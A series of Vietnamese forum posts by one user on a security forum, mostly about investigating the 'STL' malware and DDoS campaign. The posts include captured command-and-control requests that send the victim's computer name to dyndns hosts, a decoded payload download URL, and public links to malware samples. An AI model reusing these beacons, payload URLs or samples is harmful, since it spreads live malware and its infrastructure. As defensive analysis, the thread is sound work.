Messages posted by: lequi

Bạn thử kiểm tra lại đường truyền xem? Bạn dùng curl & file_get_contents để kết nối đến đâu?

Vấn đề nắm bắt thông tin IP nằm ở web service đứng sau nginx sao lại config nginx hả bạn?
Nếu dùng Apache bạn có thể dùng mod rpaf mà bạn somenuchi đã gửi ở trên.
Một đoạn config liên quan trên server mình:

RPAFenable On
# Enable reverse proxy add forward
RPAFproxy_ips 127.0.0.1 <ip_server>
# which ips are forwarding requests to us
RPAFsethostname On
# let rpaf update vhost settings
# allows to have the same hostnames as in the "real"
# configuration for the forwarding Apache
RPAFheader X-Real-IP
# Allows you to change which header mod_rpaf looks
# for when trying to find the ip the that is forwarding
# our requests

Bạn nên đưa lên đây những đoạn code liên quan đến việc setup DNP Firewall thì mọi người dễ giúp bạn hơn đó.

Các thông tin bạn đưa ở trên không giải quyết được gì.

Mình có truy cập vào trang của bạn, không phải trắng tinh như bạn nói mà vẫn có 1 đoạn html:
<html><head><title>Phim HD | Xem Phim Online | Xem Phim Online Nhanh | Xem Phim Trực Tuyến | Xem Phim Bộ | Xem Phim Chất Lượng Cao</title></head><body></body></html>
Xem lại source bạn nhé !

Trước đây bạn sử dụng host PHP phiên bản nào?
Xtremedia thường gặp các vấn đề với PHP do các phiên bản sau này đã thay đổi/bỏ 1 số hàm cũ.
Ngoài ra Xtremedia còn gặp vấn đề với PHP register_globals, các biến $HTTP_GET_VARS, $HTTP_POST_VARS.

Thiệt dở hơi, không biết bạn s3ll gì gì đó có bức xúc cho ai đó không.

Theo ý kiến của em, nếu được ai đó nên viết 1 tool remove cái đống "meo què" này, sau đó anh conmale viết 1 bài (kiểu bài báo) để mọi người đem phổ biến ở các website, forum.
Nếu may mắn hơn 1 trang báo nào đó (vnexpress, vietnamnet, ...) đăng tin thì càng tốt nữa.

eicar wrote:

Phì cười, em thấy chính các bác Admin cũng mất thời gian cho việc này, hiển nhiên là ảnh hưởng đến công việc chính của mình. Thực sự các bác nghĩ công việc chính của các bác là sống chết với HVA này ?.
Các bạn STL kia thì công việc chính của các bạn ấy là phá hoại rồi, em thấy công sức các bạn ấy bỏ ra để phá hoại có khi không nhiều hơn công sức các bác bỏ ra để phòng chống.

Mình thấy có vẻ pác là người bận rộn, lo lắng đến bản thân hơi nhiều. Ở đây mọi người quan tâm đến diễn đàn mình hoạt động (học hỏi, trao đổi ...) nên mới cùng tham gia.

Còn nói về "các bác Admin" thì việc "bỏ công sức" cũng đâu có gì là quá "rảnh", vì đối với "Admin", thì website của mình cũng chính là niềm vui, đứa con tinh thần của mình.

Vả lại trong quá trình điều tra, bỏ ra công sức trong thời gian này mọi người cũng học được nhiều thứ. Không có gì là phí phạm và "Phì cười" cả smilie

@Anh PXMMRF: Bot của STL sử dụng các browser có sẵn trên máy để DDOS hở a ?

Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header.

Theo em nghĩ, crawl cũng chỉ là 1 quá trình duyệt 1 website, parse nội dung HTML của trang đó, và lấy hết những href link trong trang, rồi tiếp tục request đến các href link đó thôi mà ?

@texudo: Hình như việc thay đổi User-Agent không liên quan đến việc server tạo ra thread khác đâu bạn.

conmale wrote:

Công nhận các bạn STL "sneaky" thiệt . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm.

Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn).

Tụi STL làm đầy log tomcat hả a smilie

Riêng em thì nghĩ đám này cũng chẳng tiêu tốn bao nhiêu tiền bạc vào chi phí server, domain đâu.
Bọn này làm được những trò nhơ như thế này, thì việc dùng tiền của người khác mua server, domain đâu phải là khó smilie

.

P/S: Rồi đâu sẽ vào đấy, chỉ khi không làm thì người khác mới không biết, đi đêm có ngày gặp ma mà smilie

Hiện tại CMC đã diệt đươc MsHelpCenter, nhưng BackupSvc thì vẫn chưa.

@acoustics89: trong vài ngàn người thì có 1 người làm được những điều như a.
@TQN: hehe

Qua vụ này, em càng thêm bớt tin tưởng vào các AVs, mà hiện tại em gỡ KIS rồi, cài CMC Free, sao lại hông có ông nào diệt mấy con e post lên đây hết hở a bolzano_1989 ?

Qua vụ này em cũng càng muốn biết về RCE 1/xxxx công lực của a TQN :-<

@mv1098: Mình đã thử thay đổi User-Agent cho đúng với User-Agent mà "bọn" virus request, nhưng vẫn ra 1 kết quả đó. Vả lại trong quá tình capture packet, kết quả trả về vẫn giống với kết quả truy cập từ trình duyệt.

@TQN: Trong mớ packet em capture thì cũng thấy URL này, và của e là đây:

http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=4&sye=0&v=0&id=08vWdU7mjkAqVg5oiy7O799iqUzTK46n&als=6D21494831435D&cn=LEQUY-PC&us=LeQuy&qmnhnqzdptpgwfkfkn=prplnfiydcrrmmshaxmypr

2 file còn lại nằm cùng thư mục, nhưng vì hôm qua nén lại mấy trăm mb nên e bỏ bớt.

http://www.mediafire.com/?7f9ag2r998797gl

@TQN: Ok a, e đã copy mấy file này sang một nơi khác và nén lại, phòng hờ khi cần.

Vậy sau 7 trang điều tra, mọi người đã có phương án gì để diệt đống này chưa ta ?

Tạm thời em nên làm gì để STL ko lấy được các thông tin từ máy em đây nhỉ ? Vì máy em có một số thông tin quan trọng smilie

Mọi người đâu mất tiêu hết rồi smilie

Bây giờ thì MsHelpCenter.exe đã nằm trong list process của em, và có thêm 1 vài mẫu (thôi thì nhầm còn hơn bỏ sót)

Report: http://www.virustotal.com/file-scan/report.html?id=27bb621157b8f697db8db29b7c33e19210f817aeba22f15f1f2cc521d9393a7c-1311680402

File: http://www.mediafire.com/?ryrpp5zn13fja90
Scan Autorun: http://www.mediafire.com/?3l9jdtb3xdm5rxy

Em nghĩ đây đích thực là đống virus rồi, vì _desktop.ini gì mà đến 2,236 KB luôn. MS chắc hông tạo ra mấy file quỷ này, mà đọc file _desktop.ini thấy có dòng "!This program cannot be run in DOS mode". Thì ... bùn.

Mấy anh xúc tiến nhanh nào, em ko muốn sống chung với virus quá lâu đâu :-<

Đây đống file đây, em public ở đây luôn được chứ mọi người ?
http://www.mediafire.com/?k2g07c5792j7cbk
Máy em có cài KIS 2012, mọi người xem thử đây có phải là virus ko.

Nếu có ai muốn teamviewer vào máy em kiểm tra, rất sẵn lòng luôn.

Và chúc mừng các anh, cuối cùng em cũng search ra được 2 file: MsHelpCenter.idx và MsHelpCenter.exe (trời ơi smilie

()

Mà em phát hiện ra 2 file này, em vui dã man.
Theo suy đoán của em, thì nguồn virus là đây: http://nethoabinh.com/showthread.php?t=315
Và rất rất nhiều các phần mềm khác trên trang này TOP google.
Hi vọng là em không làm mọi người đi sai hướng, cách đây khoảng vào lúc 1h AM ngày hôm nay, em đã tìm kiếm thử 2 file này nhưng hoàn toàn không có, vậy tại sao bây giờ lại có ???. Mà em có làm gì đâu chứ.

Lạ 1 điều là file unikey em setup vào máy (nếu như dự đoán là trước đây e chưa từng dính) ngày 24, thì các file này thấy ngày tạo ra lại là ngày 23, mà ngày 23 em nhậu tơi bời có biết gì đâu, mỗi pà chị em dùng máy smilie

. Mà việc chỉnh sửa ngày tháng tạo ra file đối với mấy anh STL là quá quá dễ, em cũng làm được nữa (bằng AutoIT hehe).

Hay là em đã vô tình nói cho các anh STL kích hoạt nó lên. Và giờ các thông tin của em tiêu tùng hết, mấy anh STL ơi em là dân đen, đừng đụng đến công việc của em dùm smilie

(.

Post sau e sẽ gửi cả đống file này lên.

@PXMMRF: Vậy phiền anh gửi cho e qua email theo profile trên HVA (cafe...@yahoo.com). Em sẽ cài đặt và kiểm tra
@TQN: Em hiểu em hiểu, hehe, có điều ko biết lúc e xài được các công cụ trên thì bọn STL này có còn hay không.

P/S: Em là dân webmaster, hic, kiểu này xem ra em hơi mạo hiểm, vì nhiều thông tin (chủ yếu là email và server) của e chắc đã bị lộ. Nhưng không sao, của mình thì không ai dễ dàng lấy được. Em sẽ cố gắng sử dụng hết các tool để tổng hợp các thông tin cần thiết.

Sau loạt bài về STL, muốn học RCE quá đi mất, nhưng tiếc là hiểu biết về ASM của em = zero.

acoustics89 wrote:

@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi

Mình rất sẵn lòng.

Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì smilie

, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn).

Không biết mình phải làm gì tiếp đây?

1 vài packet vừa bắt được, nhưng em kiểm tra smartsniff hình như ko biết được processId

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: maowoli.dyndns-free.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: biouzhen.dyndns-server.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: tongfeirou.dyndns-web.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: maowoli.dyndns-free.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: biouzhen.dyndns-server.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD chứa đường dẫn được mã hoá, key là n / 123 = 456. Thuật toán mã hoá thì mình chưa xem kĩ nhưng thiết nghĩ không cần lắm vì xâu này cố định rồi. nó sau khi giải mã ra là http://poxxf.com/flash.swf , tải file này về với User Agent là Gozilla_2/Default.

cái link để download là http://poxxf.com/flash.swf?cpn=<User name>

Thôi tiêu, em vừa thấy acoustics89 nhắc đến User Agent: Gozilla và cấu trúc request kiểu ?cpn=[PC USERNAME]
Bài trước em có nhắc đến User Agent này, vì vội quá nên chưa gửi cho a PXMMRF được.

Phải chăng file unikey ở http://nethoabinh.com/showthread.php?t=315, và nghi ngờ ở http://nethoabinh.com/showthread.php?t=651 cũng của STL (nhưng file này đã bị xoá) ???

Các từ khoá liên quan đến việc tải unikey, flash player trên google trang này (nethoabinh) đều có kết quả đứng đầu (top).

Vừa bật lại cái Wireshark, có 1 vài thông tin bắt được (tên miền gì toàn tiếng Trung Quốc >"< smilie

:

maowoli.dyndns-free.com (Destination IP: 78.110.24.85)
biouzhen.dyndns-server.com (Destination IP: 78.110.24.85)
tongfeirou.dyndns-web.com (Destination: server86944.santrex.net)

Vẫn chưa biết được service/process nào liên quan đến những URL này smilie

. Em đang bật smartsniff của nirsoft nhưng tình hình có vẻ im lặng quá.

Ngóng chờ tiếp smilie

@PXMMRF: Em sẽ kiểm tra các thông tin anh cần, và có 1 vài lưu ý là các thông tin e để trên đều liên quan đến DNS của Google, vì các thông tin trên tổng hợp trong quá trình bắt các packet gửi qua IP 8.8.8.8 (ngày mai em sẽ dump và gửi cho a vài chi tiết).

Hôm nay em cũng có dạo qua các site, và down bộ unikey từ link: http://nethoabinh.com/showthread.php?t=315
Quét file này trên virustotal: http://www.virustotal.com/file-scan/report.html?id=02b3b347ff00c8bdcad7e4c557a41f36e4af110658aea57557fab2c0bd641b1e-1311508169

cayaoanh830 wrote:

Theo như sự phân tích ở trên thì các vụ tấn công Ddos đều giả các cuộc lức wed bình thường nhưng dù gì thì máy tính vẫn là máy tính nó không có trí thông minh bằng người chế tạo ra nó được nó cũng chỉ làm theo những dòng code có sẵn. dựa vào sự suy nghĩ trên em nghĩ ra được 1 cách không biết có được không nếu có gì sai xin các bác bỏ qua cho em . dừng chém em tội nghiệp em lắm :
=>Tại sau chúng ta không phân biệt sự truy cập đó là người hay là máy bằng cách đưa ra các câu hỏi (như 10+5 = ? hoặc đưa ra một từ tiếng anh mất 1 chữ và nghĩa tiếng việt của nó để ta điền vào ...) để người nào muốn truy cập vào một trang bất kì của HVA cũng phải giải nó.

Đến lúc đống zombie đó kết nối được đến tầng này thì chắc server nào bị dội cũng sụm bà chè rồi. Hehe
Em vừa vọc vài thứ trong máy, có lòi ra mấy URL (via whireshark):

http://tongfeirou.dyndns-web.com/banner1.png?cpn=<COMPUTER USERNAME> (404)
https://biouzhen.dyndns-server.com/banner1.png?cpn=<COMPUTER USERNAME> (403 nginx)

với User-Agent đều là:

Gozilla_2/General (??)

Đang tiếp tục vọc tiếp ...

@TQN: Em cũng có dịp đi sửa máy cho vài người bạn, người thân. Đa phần là họ không rành rọt mấy về AV. Nếu mình làm 1 phần mềm chỉ cần họ Run 1 cái, chạy chạy mấy cái progress bar, quét xong hiện cái thông tin đã diệt được em abcd xyz gì đó là họ đã vui lắm lắm rồi. Đợi mấy AVs update thì lúc đó đám STL lại sinh ra mẫu khác thì mình khó chủ động smilie

.

Site em chuyên về giải trí, nên số người biết đến vấn đề này chắc cũng không nhiều. Em có thông báo thì cũng không mấy ngừời biết đường diệt.

@acoustics89: Nếu vậy thì tuyệt quá, ông a code sớm sớm tý, em suggest 1 vài chức năng cần thêm như:
- Tự động cập nhập
- Có thể chạy trên windows 7, không biết virus của tụi này có chạy được trên win 7 không, vì win 7 em đang dùng phân quyền khá tốt, mún thao tác trong ổ C (thư mục program files) và registry đều phải dưới quyền administrator.
- Sau khi quét xong nếu máy đang kết nối internet thì sẽ report "Đã quét được xxxx virus, IP: xxx.xxx.xxx.xxx, tên virus này nọ". Có thể chức năng này không cần, nhưng biết đâu sau này nó sẽ có ích.
- Thêm nữa là chặn luôn mấy URL, IP nghi ngờ của đám STL.

Em xin hết.